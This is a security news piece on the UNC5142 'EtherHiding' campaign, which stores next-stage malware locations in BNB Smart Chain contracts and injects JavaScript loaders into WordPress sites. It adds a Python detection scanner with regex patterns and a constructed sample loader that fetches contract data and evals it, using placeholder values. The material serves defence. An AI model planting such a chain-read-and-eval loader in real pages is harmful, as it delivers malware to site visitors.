A threat actor tracked as UNC5142 has been observed using smart contracts on a public blockchain to distribute information-stealing malware affecting both Windows and macOS systems. The malware families involved include Atomic, Lumma, and Vidar. The technique, known as EtherHiding, stores the malicious code on the BNB Smart Chain, allowing the group's activity to blend in with legitimate Web3 transactions.
Thousands of compromised websites
According to reports from the Google Threat Intelligence Group, around 14,000 compromised web pages have been flagged for containing malicious JavaScript, reflecting the group's indiscriminate targeting of vulnerable WordPress sites. UNC5142 injects this code into the compromised websites, which then deliver malware through a multi-stage process. A key component is the JavaScript downloader called CLEARSHORT, which handles malware delivery through the infected sites.
Since November 2024, UNC5142 has evolved from a single-contract system to a more complex setup involving three smart contracts, which gives its campaigns greater operational agility. This architecture resembles the proxy pattern, a software design pattern, and lets critical parts of the attack chain be updated quickly without modifying the JavaScript on the compromised sites.
These smart contracts let UNC5142 change the URL from which the next stage is fetched. Furthermore, the analysis revealed two distinct sets of smart-contract infrastructure used for malware distribution, showing the group's ability to adapt and to keep its operations resilient.
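From the defender's side, one practical check is to look for injected scripts that read their next stage from a smart contract and then execute what came back. The following Python scanner is an added example, not code from the report or the article; its indicator patterns are heuristics and the sample page, including the contract address and calldata placeholders, is constructed for this illustration.

```python
import re
from html.parser import HTMLParser

# Heuristic indicator classes for an EtherHiding-style loader as described above: the
# injected script reads its next stage from a contract (JSON-RPC eth_call to a BNB Smart
# Chain node, chain id 56), decodes it and executes it. Starting points, not IoCs.
INDICATORS = {
    "chain-read": re.compile(r"eth_call|bsc[-_]?dataseed|chainId['\"]?\s*:\s*56\b", re.I),
    "decode": re.compile(r"\batob\s*\(|fromCharCode|hexToString|toUtf8String", re.I),
    "dynamic-exec": re.compile(r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(", re.I),
}

class _InlineScripts(HTMLParser):
    """Collect the bodies of inline <script> elements; external src= scripts are skipped."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def score_script(src):
    """Return the indicator classes one script body matches, in INDICATORS order."""
    return [name for name, pat in INDICATORS.items() if pat.search(src)]

def scan_page(html):
    """Flag inline scripts that both read from the chain and execute what they fetched."""
    parser = _InlineScripts()
    parser.feed(html)
    return [(i, hits) for i, s in enumerate(parser.scripts)
            for hits in [score_script(s)]
            if "chain-read" in hits and "dynamic-exec" in hits]

# Constructed sample page: a benign inline snippet, an external script, then a
# loader-shaped script with placeholder contract address and calldata (not real indicators).
SAMPLE_HTML = """<html><body>
<script>console.log("site loaded");</script>
<script src="/wp-includes/js/jquery.js"></script>
<script>
fetch("https://rpc.example.invalid/", {method: "POST", body: JSON.stringify({jsonrpc: "2.0",
  id: 1, method: "eth_call", params: [{to: "0xCONTRACT_PLACEHOLDER", data: "0xCALLDATA_PLACEHOLDER"}, "latest"]})})
  .then(r => r.json()).then(j => eval(hexToString(j.result)));
</script>
</body></html>"""
```

Running `scan_page(SAMPLE_HTML)` returns the index of the loader-shaped script with all three indicator classes, while the analytics snippet and the external script are left alone.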

These methods not only increase the risk to Internet users but also make the group's malicious activity harder to detect and take down. Google has not observed UNC5142 activity since July 2025, which could indicate either a pause in operations or a change in operational strategy.